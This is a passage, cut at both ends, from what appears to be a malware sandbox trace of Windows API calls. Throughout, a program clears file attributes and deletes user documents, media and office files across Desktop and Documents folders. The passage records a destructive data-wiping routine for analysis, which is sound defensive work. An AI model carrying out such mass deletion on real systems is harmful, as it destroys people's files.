HALPmcxz\\Desktop\\fQ_p.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fq_p.png")) returned 1 [0152.986] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0152.999] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IJ94UMlIJ.avi", dwFileAttributes=0x80) returned 1 [0152.999] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IJ94UMlIJ.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ij94umlij.avi")) returned 1 [0153.003] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0153.010] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\krn8OUUWVtzhbT9Qc.png", dwFileAttributes=0x80) returned 1 [0153.011] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\krn8OUUWVtzhbT9Qc.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\krn8ouuwvtzhbt9qc.png")) returned 1 [0153.014] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0153.020] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pkpT _yaZ8DAw.mp3", dwFileAttributes=0x80) returned 1 [0153.021] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pkpT _yaZ8DAw.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pkpt _yaz8daw.mp3")) returned 1 [0153.024] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0153.036] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tDBhx614vfdrOhew.avi", dwFileAttributes=0x80) returned 1 [0153.036] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tDBhx614vfdrOhew.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdbhx614vfdrohew.avi")) returned 1 [0153.040] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0153.051] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tey9HO85lbhM8Q.mp3", dwFileAttributes=0x80) returned 1 [0153.052] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tey9HO85lbhM8Q.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tey9ho85lbhm8q.mp3")) returned 1 [0153.056] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0153.061] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ToZUo4ySLw8I_WrMcgXS.pptx", dwFileAttributes=0x80) returned 1 [0153.062] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ToZUo4ySLw8I_WrMcgXS.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tozuo4yslw8i_wrmcgxs.pptx")) returned 1 [0153.065] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0153.078] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TXBg7dagYX16D.ppt", dwFileAttributes=0x80) returned 1 [0153.079] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TXBg7dagYX16D.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\txbg7dagyx16d.ppt")) returned 1 [0153.083] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0153.095] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wJSrkvxMGpGhoHTZXy1b.docx", dwFileAttributes=0x80) returned 1 [0153.095] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wJSrkvxMGpGhoHTZXy1b.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wjsrkvxmgpghohtzxy1b.docx")) returned 1 [0153.100] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0153.111] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yftWrS-.mp4", dwFileAttributes=0x80) returned 1 [0153.112] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yftWrS-.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yftwrs-.mp4")) returned 1 [0153.116] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0153.116] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0153.116] CoTaskMemFree (pv=0x508980) [0153.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.122] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0153.127] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uNe5\\5aYTN_XxDj4Z.csv", dwFileAttributes=0x80) returned 1 [0153.128] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uNe5\\5aYTN_XxDj4Z.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\une5\\5aytn_xxdj4z.csv")) returned 1 [0153.132] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0153.141] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uNe5\\ekMcgxfMAo6bN17bvj.odt", dwFileAttributes=0x80) returned 1 [0153.141] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uNe5\\ekMcgxfMAo6bN17bvj.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\une5\\ekmcgxfmao6bn17bvj.odt")) returned 1 [0153.145] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0153.152] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uNe5\\u2T_ON1HHBD7HXJG9WI0.mp4", dwFileAttributes=0x80) returned 1 [0153.152] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uNe5\\u2T_ON1HHBD7HXJG9WI0.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\une5\\u2t_on1hhbd7hxjg9wi0.mp4")) returned 1 [0153.156] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0153.156] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0153.156] CoTaskMemFree (pv=0x508980) [0153.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.156] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0153.163] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v-QJjzr3o60\\-cU6pW.mp3", dwFileAttributes=0x80) returned 1 [0153.164] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v-QJjzr3o60\\-cU6pW.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v-qjjzr3o60\\-cu6pw.mp3")) returned 1 [0153.166] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0153.176] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v-QJjzr3o60\\boMvkTSv.swf", dwFileAttributes=0x80) returned 1 [0153.176] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v-QJjzr3o60\\boMvkTSv.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v-qjjzr3o60\\bomvktsv.swf")) returned 1 [0153.180] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0153.185] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v-QJjzr3o60\\PNwZ6I8E1zau.doc", dwFileAttributes=0x80) returned 1 [0153.186] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v-QJjzr3o60\\PNwZ6I8E1zau.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v-qjjzr3o60\\pnwz6i8e1zau.doc")) returned 1 [0153.189] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0153.197] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v-QJjzr3o60\\VrCt5.flv", dwFileAttributes=0x80) returned 1 [0153.197] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v-QJjzr3o60\\VrCt5.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v-qjjzr3o60\\vrct5.flv")) returned 1 [0153.201] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0153.201] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0153.201] CoTaskMemFree (pv=0x508980) [0153.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.202] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0153.208] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v-QJjzr3o60\\a2jq\\1Q6NkUamHGep.pps", dwFileAttributes=0x80) returned 1 [0153.209] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v-QJjzr3o60\\a2jq\\1Q6NkUamHGep.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v-qjjzr3o60\\a2jq\\1q6nkuamhgep.pps")) returned 1 [0153.219] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0153.228] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v-QJjzr3o60\\a2jq\\ddNpUN.jpg", dwFileAttributes=0x80) returned 1 [0153.228] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v-QJjzr3o60\\a2jq\\ddNpUN.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v-qjjzr3o60\\a2jq\\ddnpun.jpg")) returned 1 [0153.233] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0153.241] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v-QJjzr3o60\\a2jq\\gVP4XW OQnjnrz09j.pptx", dwFileAttributes=0x80) returned 1 [0153.242] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v-QJjzr3o60\\a2jq\\gVP4XW OQnjnrz09j.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v-qjjzr3o60\\a2jq\\gvp4xw oqnjnrz09j.pptx")) returned 1 [0153.246] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0153.247] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0153.247] CoTaskMemFree (pv=0x508980) [0153.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.247] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0153.253] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v-QJjzr3o60\\a2jq\\7 4z\\RK-_xAsiLu.jpg", dwFileAttributes=0x80) returned 1 [0153.253] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v-QJjzr3o60\\a2jq\\7 4z\\RK-_xAsiLu.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v-qjjzr3o60\\a2jq\\7 4z\\rk-_xasilu.jpg")) returned 1 [0153.256] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0153.261] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v-QJjzr3o60\\a2jq\\7 4z\\SitGaOuot8.wav", dwFileAttributes=0x80) returned 1 [0153.261] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v-QJjzr3o60\\a2jq\\7 4z\\SitGaOuot8.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v-qjjzr3o60\\a2jq\\7 4z\\sitgaouot8.wav")) returned 1 [0153.264] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0153.271] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v-QJjzr3o60\\a2jq\\7 4z\\xHSne.jpg", dwFileAttributes=0x80) returned 1 [0153.271] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v-QJjzr3o60\\a2jq\\7 4z\\xHSne.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v-qjjzr3o60\\a2jq\\7 4z\\xhsne.jpg")) returned 1 [0153.274] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0153.279] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v-QJjzr3o60\\a2jq\\7 4z\\_PzZ.flv", dwFileAttributes=0x80) returned 1 [0153.280] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v-QJjzr3o60\\a2jq\\7 4z\\_PzZ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v-qjjzr3o60\\a2jq\\7 4z\\_pzz.flv")) returned 1 [0153.285] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0153.285] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0153.285] CoTaskMemFree (pv=0x508980) [0153.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0153.285] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0153.293] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4_6pp.pptx", dwFileAttributes=0x80) returned 1 [0153.294] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4_6pp.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4_6pp.pptx")) returned 1 [0153.297] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0153.307] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\97UE08p I0.xlsx", dwFileAttributes=0x80) returned 1 [0153.307] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\97UE08p I0.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\97ue08p i0.xlsx")) returned 1 [0153.310] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0153.321] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\acBQx0ManDP8NfU87cmD.docx", dwFileAttributes=0x80) returned 1 [0153.321] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\acBQx0ManDP8NfU87cmD.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\acbqx0mandp8nfu87cmd.docx")) returned 1 [0153.325] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0153.334] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bDQ6MF6c_eTd.pptx", dwFileAttributes=0x80) returned 1 [0153.334] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bDQ6MF6c_eTd.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bdq6mf6c_etd.pptx")) returned 1 [0153.338] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0153.345] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c tvSlTE_1c2y7.xlsx", dwFileAttributes=0x80) returned 1 [0153.346] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c tvSlTE_1c2y7.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c tvslte_1c2y7.xlsx")) returned 1 [0153.349] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0153.356] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cIg2znE6YnCidJF TVHf.pptx", dwFileAttributes=0x80) returned 1 [0153.356] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cIg2znE6YnCidJF TVHf.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cig2zne6yncidjf tvhf.pptx")) returned 1 [0153.359] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0153.370] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CTNATDjNglIKg4hHmo.docx", dwFileAttributes=0x80) returned 1 [0153.370] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CTNATDjNglIKg4hHmo.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ctnatdjnglikg4hhmo.docx")) returned 1 [0153.374] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0153.383] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\E1SG.docx", dwFileAttributes=0x80) returned 1 [0153.383] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\E1SG.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\e1sg.docx")) returned 1 [0153.387] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0153.396] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EIUyC0V9J.ppt", dwFileAttributes=0x80) returned 1 [0153.396] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EIUyC0V9J.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\eiuyc0v9j.ppt")) returned 1 [0153.400] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0153.408] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hUKn-UIba-2CZgIb.pptx", dwFileAttributes=0x80) returned 1 [0153.408] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hUKn-UIba-2CZgIb.pptx" (normalized: "c:\\users\\5p5nrgjn0js 